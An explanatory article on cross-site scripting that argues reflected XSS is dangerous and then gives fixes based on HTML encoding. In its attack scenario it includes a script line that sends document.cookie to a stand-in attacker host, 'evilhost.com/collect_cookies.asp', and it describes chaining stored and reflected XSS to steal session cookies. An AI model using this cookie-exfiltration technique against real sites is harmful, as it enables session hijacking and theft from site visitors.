XSS Vulnerabilities, So understimated, so dangerous
In this little paper I will try to convince admins, webmaster
and in general everyone is concerned to secure a web site of how
dangerous can be a XSS hole. I will not cover in depth what XSS
is because there's a huge library on this topic available on
internet and on www.hackerscenter.com/library
--[ 2.0 XSS So what's XSS? XSS stands for cross site scripting,
that is a way to inject script code into a web page making it
execute whenever the page loads or a specific event is triggered.
2.1 Temporary XSS
A factor because of which this kind of bug is understimated is
due to the "temporary xss" as I use to call them. Temporary xss
are script codes executed only when a script code within a
crafted input is issued by the user.
Example: http://vuln.host.com/search.asp?q=
The above example will inject a "" tag in the
search.asp page showing the source html code of the page The
point here is: Who searched for will see the source
code but this not implies any permanent alteration of the page.
2.2 Permanent XSS
A "permanent XSS" as I use to call them, are due to unsanitized
input by user that will be saved on a database for example. Each
time these unsanitized fields are read from the database and
printed on the page the script will be executed. (A lot of
registration forms server side scripts are affected by this kind
of vuln)
--[ 3.0 Attacks
What I want to demonstrate in this article is how dangerous can
be a temporary xss. Most of the webmaster (99%, believe me),
treat this kind of bug as very very low level issue because of
the reasons we have seen. They think it is even a loss of time
to sanitize input that doesn't go into a database.
What they seem to be unable to understand is that whenever a
malicious user is able to run a client side script from their
domain name a cookie stealing attack can be *easily* taken. This
becomes a high level risk vuln when we deal with ecommerce site,
webmail service and similar.
3.1 Scenario 1
Let's assume that we've found a xss vuln into 2 sites. The first
will be used as the "dumb" (A) site, that has a permanent xss
hole, while the latter will be a big shopping portal (B) I want
to steal cookie from, that has "just" a little innocent
temporary xss hole.
We mail the big shopping portal admin about the vuln, trying to
make him understand how serious it is the bug. He never reply.
So we decide to have some fun...innocent fun..as much innocent
as their xss hole was, I suppose...
What one could do is to inject a stealth script into the dumb
site to force (always stealthly) every visitor of site A to load
the vulnerable url we have found into site B. Here anyone can
understand that even
http://vuln.host.com/search.asp?q= is now very very
useful for our purpose. Instead of , we can use
something like this: http://vuln.host.com/search.asp?q=
Funny.js will be our malicious script code that will be run on
vuln.host.com domain ...and it will be similar to this: //
Funny.js navigate to 'evilhost.com/collect_cookies.asp?cookie='
+ document.cookie // where collect_cookies.asp will be a server
side script that will collect everything passed by parameter
"cookie" and evilhost.com can be a hosting space set up by the
malicious attacker.
So what happens here? 1. A user visits dumb site thus triggering
our permanent xss. 2. The permanent xss will load the page
http://vuln.host.com/search.asp?q= that
executes funny.js thanks to the temporary xss hole in the big
shopping portal. 3. funny.js is now loaded on the big shopping
portal domain name letting us steal the cookie (and the login
data) of the dumb site visitor.
By "stealth script" we mean a script that doesn't change the
appearance of the page so that no one will notice any background
work.
-- [ Side effects
In this section I will show some side effects of the xss desease
that are often forgotten or misunderstood by a lot of
analysts/webmasters.
The xss holes, permanent and tempory ones, can be used to attack
a local victim (visitor of the vulnerable site) directly by
injecting a malicious code capable of exploting a local
vulnerability of the victim system. This has become very common
(and easy to do) because of the tons of vulnerabilities that
affect Internet Explorer and the browsers in general.
Let's take for example a xss hole into trustedsite.com. Anyone
could take advantage of the trustness of this domain to execute
code with high privilege levels, executing or installing
malicious activex. This kind of approach can be taken into
Internet Exlporer and in general in all the browsers that use
the so called trusted "Zones".
Another important issue that can make a simple XSS hole a high
level risk issue is the capability of attacking thousands
computers into few hours or even into minutes according to the
traffic of the vulnerable page. This kind of practice can lead
to malware/adware spread. If a high traffic page is vulnerable
to a permanent xss a malware/worm/adware coder can choose this
kind of approach to put the seeds of his worm making it spread
in a stealth manner and within few time.
-- [ How to solve the problem
Incredible to say, XSS holes are the most simple to solve and
fix. They usually involve script tag but not always. Less known
code can use the image tag with dynsrc or src parameters and
"javascript:alert('aaa')" as argument or the
In general the characters to be sanitized are the usual "<" and
">" but there are some more to be carefully escaped: &{code};
will run the code into netscape / mozilla browsers so "&{"
combination of chars should be sanitized too. In the 99% of the
cases an "HTML Encode" would solve the problem. In asp it can be
easily done with the inbuilt function
server.htmlencode(myparameter).